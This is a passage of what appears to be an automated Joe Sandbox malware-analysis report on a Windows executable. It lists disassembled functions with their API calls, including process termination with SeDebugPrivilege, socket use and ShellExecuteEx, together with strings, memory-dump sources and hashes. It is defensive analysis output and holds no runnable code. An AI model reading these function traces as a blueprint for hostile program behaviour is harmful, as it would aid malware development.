                                                                                                                                                                            • Instruction ID: 9bba91ef4dc778c2f650dfeeb64e2421955b24c811521acb0ff2ea30f7e21ab4
                                                                                                                                                                            • Opcode Fuzzy Hash: 479caab55668cb366915d949cc225768a165c6e5311aa2954e4ad3bcc6957c01
                                                                                                                                                                            • Instruction Fuzzy Hash: 2A41D571904388AFEB219F65CC85BEF77E8EF08364F10042BF544E7292D6799D858B58
                                                                                                                                                                            Function 004DEC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004C3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 004C3EB6
                                                                                                                                                                              • Part of subcall function 004C3E91: Process32FirstW.KERNEL32(00000000,?), ref: 004C3EC4
                                                                                                                                                                              • Part of subcall function 004C3E91: CloseHandle.KERNEL32(00000000), ref: 004C3F8E
                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004DECB8
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 004DECCB
                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004DECFA
                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 004DED77
                                                                                                                                                                            • GetLastError.KERNEL32(00000000), ref: 004DED82
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004DEDB7
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                            • String ID: SeDebugPrivilege
                                                                                                                                                                            • API String ID: 2533919879-2896544425
                                                                                                                                                                            • Opcode ID: 72fc840082288528ae85bef500dd0405067927cc682828be5439a3fbc46e1f3c
                                                                                                                                                                            • Instruction ID: 3bcb6f47ac34147da1b59f91edb6f93fa49885f888dd31efa174c6d76429c307
                                                                                                                                                                            • Opcode Fuzzy Hash: 72fc840082288528ae85bef500dd0405067927cc682828be5439a3fbc46e1f3c
                                                                                                                                                                            • Instruction Fuzzy Hash: 04416E712002019FDB14EF15C8A5F6EB7A5AF44718F08845EF8469F3D2DBB9AC05CB9A
                                                                                                                                                                            Function 004C3226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 004C32C5
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: IconLoad
                                                                                                                                                                            • String ID: blank$info$question$stop$warning
                                                                                                                                                                            • API String ID: 2457776203-404129466
                                                                                                                                                                            • Opcode ID: ccf9158012c4a34e1c4e2d1ca1109767a38b3e929891f8131f765f8ef6d3ad82
                                                                                                                                                                            • Instruction ID: ca7ffd106d90ef4a1a79f38dd1af3068d608c4612de1de4f631beab7ad0a3444
                                                                                                                                                                            • Opcode Fuzzy Hash: ccf9158012c4a34e1c4e2d1ca1109767a38b3e929891f8131f765f8ef6d3ad82
                                                                                                                                                                            • Instruction Fuzzy Hash: 4F115B39208346BABB025E55EC42EAFB79CEF19B76F10406FF40056282E7BD5B4146AD
                                                                                                                                                                            Function 004C4534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 004C454E
                                                                                                                                                                            • LoadStringW.USER32(00000000), ref: 004C4555
                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004C456B
                                                                                                                                                                            • LoadStringW.USER32(00000000), ref: 004C4572
                                                                                                                                                                            • _wprintf.LIBCMT ref: 004C4598
                                                                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004C45B6
                                                                                                                                                                            Strings
                                                                                                                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 004C4593
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                            • API String ID: 3648134473-3128320259
                                                                                                                                                                            • Opcode ID: aa62b6460b5c8d89bb102818b05d80adf684e099f193f9de02a9983f3bf54119
                                                                                                                                                                            • Instruction ID: 8f364bbea4e4d7680841e37f50802f3bc6ba85e43ba9789e1c34997c6e080797
                                                                                                                                                                            • Opcode Fuzzy Hash: aa62b6460b5c8d89bb102818b05d80adf684e099f193f9de02a9983f3bf54119
                                                                                                                                                                            • Instruction Fuzzy Hash: E501A7F6400248BFE750A7A0DD89EF7776CD708301F0005B6BB45D6052E6345E894B78
                                                                                                                                                                            Function 004ED74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00462612: GetWindowLongW.USER32(?,000000EB), ref: 00462623
                                                                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 004ED78A
                                                                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 004ED7AA
                                                                                                                                                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 004ED9E5
                                                                                                                                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 004EDA03
                                                                                                                                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 004EDA24
                                                                                                                                                                            • ShowWindow.USER32(00000003,00000000), ref: 004EDA43
                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004EDA68
                                                                                                                                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 004EDA8B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1211466189-0
                                                                                                                                                                            • Opcode ID: cf1f467cad3c6ed120295747bfb9f02dcb21296b8ba156abbf77fb47556fc0c2
                                                                                                                                                                            • Instruction ID: 4a716734295105bbc298457862ff352fbdf91e55468d796900095030defb491c
                                                                                                                                                                            • Opcode Fuzzy Hash: cf1f467cad3c6ed120295747bfb9f02dcb21296b8ba156abbf77fb47556fc0c2
                                                                                                                                                                            • Instruction Fuzzy Hash: 7DB18C71900295EFDF14CF6AC9C57BE7BB1BF04702F08817AEC489A296D738AA54CB54
                                                                                                                                                                            Function 00462A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0049C417,00000004,00000000,00000000,00000000), ref: 00462ACF
                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0049C417,00000004,00000000,00000000,00000000,000000FF), ref: 00462B17
                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0049C417,00000004,00000000,00000000,00000000), ref: 0049C46A
                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0049C417,00000004,00000000,00000000,00000000), ref: 0049C4D6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ShowWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1268545403-0
                                                                                                                                                                            • Opcode ID: be0db26923cb47d064d658d3c7b239daf6ee728d345ccba43764013a13b65b32
                                                                                                                                                                            • Instruction ID: 686193b0cf11d840aae20db6177778e936546bbd316b1ac01ed15b46aa359574
                                                                                                                                                                            • Opcode Fuzzy Hash: be0db26923cb47d064d658d3c7b239daf6ee728d345ccba43764013a13b65b32
                                                                                                                                                                            • Instruction Fuzzy Hash: 6A411C30604BC0BACF758B689ED867B3B91AB55300F14852FE08746661E6FDA846E71F
                                                                                                                                                                            Function 004C7368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 004C737F
                                                                                                                                                                              • Part of subcall function 00480FF6: std::exception::exception.LIBCMT ref: 0048102C
                                                                                                                                                                              • Part of subcall function 00480FF6: __CxxThrowException@8.LIBCMT ref: 00481041
                                                                                                                                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 004C73B6
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 004C73D2
                                                                                                                                                                            • _memmove.LIBCMT ref: 004C7420
                                                                                                                                                                            • _memmove.LIBCMT ref: 004C743D
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 004C744C
                                                                                                                                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004C7461
                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 004C7480
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 256516436-0
                                                                                                                                                                            • Opcode ID: e7e732273fb121324991250b3d20bd92e73f2d916be7ae4f315a8c80de16b8ac
                                                                                                                                                                            • Instruction ID: c16a94fc0c03bd838ef0b45b8324448c0e8a1cd4589db68749bcfbc838439127
                                                                                                                                                                            • Opcode Fuzzy Hash: e7e732273fb121324991250b3d20bd92e73f2d916be7ae4f315a8c80de16b8ac
                                                                                                                                                                            • Instruction Fuzzy Hash: 5F31AE35900205EBCF10EF55DC85AAFBB78EF45310B1480BAFA04AB256DB349A14DBA8
                                                                                                                                                                            Function 004E6442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 004E645A
                                                                                                                                                                            • GetDC.USER32(00000000), ref: 004E6462
                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004E646D
                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 004E6479
                                                                                                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 004E64B5
                                                                                                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004E64C6
                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,004E9299,?,?,000000FF,00000000,?,000000FF,?), ref: 004E6500
                                                                                                                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004E6520
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3864802216-0
                                                                                                                                                                            • Opcode ID: 6e3c7cdfdd8a09394fec86c4fe3296890f0f44a821008f235623303c627711b2
                                                                                                                                                                            • Instruction ID: be8933e6776a3aa112558ba6ce40661434c8d24f6c4dbb5b36da327cef6be88e
                                                                                                                                                                            • Opcode Fuzzy Hash: 6e3c7cdfdd8a09394fec86c4fe3296890f0f44a821008f235623303c627711b2
                                                                                                                                                                            • Instruction Fuzzy Hash: 1F31B172200250BFEB108F61DC89FEB3FA9EF09761F044066FE089E292C6759C41CB68
                                                                                                                                                                            Function 004BC072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memcmp
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2931989736-0
                                                                                                                                                                            • Opcode ID: c9f44201ea0bace305671cfd34d46080734ef5db8ae5a63e42d9ec0c9a245657
                                                                                                                                                                            • Instruction ID: e75bef756129cc474f783f43beea25800e4aa594327ef8a1ca9fc5729f9f8d47
                                                                                                                                                                            • Opcode Fuzzy Hash: c9f44201ea0bace305671cfd34d46080734ef5db8ae5a63e42d9ec0c9a245657
                                                                                                                                                                            • Instruction Fuzzy Hash: 3B21B371601209B79610B5259DC2FFF239CAE20398B140027FF05A6392F79DDD1286BE
                                                                                                                                                                            Function 004CED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00469997: __itow.LIBCMT ref: 004699C2
                                                                                                                                                                              • Part of subcall function 00469997: __swprintf.LIBCMT ref: 00469A0C
                                                                                                                                                                              • Part of subcall function 0047FEC6: _wcscpy.LIBCMT ref: 0047FEE9
                                                                                                                                                                            • _wcstok.LIBCMT ref: 004CEEFF
                                                                                                                                                                            • _wcscpy.LIBCMT ref: 004CEF8E
                                                                                                                                                                            • _memset.LIBCMT ref: 004CEFC1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                                                            • String ID: X
                                                                                                                                                                            • API String ID: 774024439-3081909835
                                                                                                                                                                            • Opcode ID: ed62b08df785ecdbc9153167ff695bcab81adc391d8ec54303489365be7426c0
                                                                                                                                                                            • Instruction ID: a347b3cbd8a74c297354c57a701fdd79c8df15559699b7516eccc479fd76266e
                                                                                                                                                                            • Opcode Fuzzy Hash: ed62b08df785ecdbc9153167ff695bcab81adc391d8ec54303489365be7426c0
                                                                                                                                                                            • Instruction Fuzzy Hash: 85C160755043009FC754EF25C881E5AB7E4BF85318F04492EF899972A2EB78ED49CB8B
                                                                                                                                                                            Function 004D6E17 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __WSAFDIsSet.WSOCK32(00000000,?), ref: 004D6F14
                                                                                                                                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 004D6F35
                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 004D6F48
                                                                                                                                                                            • htons.WSOCK32(?), ref: 004D6FFE
                                                                                                                                                                            • inet_ntoa.WSOCK32(?), ref: 004D6FBB
                                                                                                                                                                              • Part of subcall function 004BAE14: _strlen.LIBCMT ref: 004BAE1E
                                                                                                                                                                              • Part of subcall function 004BAE14: _memmove.LIBCMT ref: 004BAE40
                                                                                                                                                                            • _strlen.LIBCMT ref: 004D7058
                                                                                                                                                                            • _memmove.LIBCMT ref: 004D70C1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3619996494-0
                                                                                                                                                                            • Opcode ID: ed6e3ea77a5407bf5b3a4815691f29c75bbcb46321619ef58d8503586918150a
                                                                                                                                                                            • Instruction ID: 686e6fa88d60dd3e7691ffda7ada9d63f7bc3436f99897ef95eccd51fe50253b
                                                                                                                                                                            • Opcode Fuzzy Hash: ed6e3ea77a5407bf5b3a4815691f29c75bbcb46321619ef58d8503586918150a
                                                                                                                                                                            • Instruction Fuzzy Hash: C881FF31108300ABD710EF25CC95E6BB3A9AF84718F10491FF5459B3E2EB79AD05CB9A
                                                                                                                                                                            Function 00461424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 74c35cd3fcdb7aa6dc208653b27d45a4fb391d75935c43bd2010607e1d392f49
                                                                                                                                                                            • Instruction ID: 34b18cb07268bf439261535d38afe6d16c2a65034d20f0a724145f122b69273f
                                                                                                                                                                            • Opcode Fuzzy Hash: 74c35cd3fcdb7aa6dc208653b27d45a4fb391d75935c43bd2010607e1d392f49
                                                                                                                                                                            • Instruction Fuzzy Hash: D9718F70900109EFDB04CF54CC84ABFBB79FF85314F14815AF915AB261D738AA51CBAA
                                                                                                                                                                            Function 004EB60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • IsWindow.USER32(00D355D0), ref: 004EB6A5
                                                                                                                                                                            • IsWindowEnabled.USER32(00D355D0), ref: 004EB6B1
                                                                                                                                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 004EB795
                                                                                                                                                                            • SendMessageW.USER32(00D355D0,000000B0,?,?), ref: 004EB7CC
                                                                                                                                                                            • IsDlgButtonChecked.USER32(?,?), ref: 004EB809
                                                                                                                                                                            • GetWindowLongW.USER32(00D355D0,000000EC), ref: 004EB82B
                                                                                                                                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 004EB843
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4072528602-0
                                                                                                                                                                            • Opcode ID: c28c2081763742fd05e59fd91efefc014d073e29606566fdb8237da7fb43f352
                                                                                                                                                                            • Instruction ID: 8c6d15d21fde1be03b574301ba8591ffa360849640ac6806021c4059c3eed103
                                                                                                                                                                            • Opcode Fuzzy Hash: c28c2081763742fd05e59fd91efefc014d073e29606566fdb8237da7fb43f352
                                                                                                                                                                            • Instruction Fuzzy Hash: 2C71C134600284AFDB209F66C8D4FAB7BB9FF49302F14046AE945973A1C739AD51CB99
                                                                                                                                                                            Function 004DF732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 004DF75C
                                                                                                                                                                            • _memset.LIBCMT ref: 004DF825
                                                                                                                                                                            • ShellExecuteExW.SHELL32(?), ref: 004DF86A
                                                                                                                                                                              • Part of subcall function 00469997: __itow.LIBCMT ref: 004699C2
                                                                                                                                                                              • Part of subcall function 00469997: __swprintf.LIBCMT ref: 00469A0C
                                                                                                                                                                              • Part of subcall function 0047FEC6: _wcscpy.LIBCMT ref: 0047FEE9
                                                                                                                                                                            • GetProcessId.KERNEL32(00000000), ref: 004DF8E1
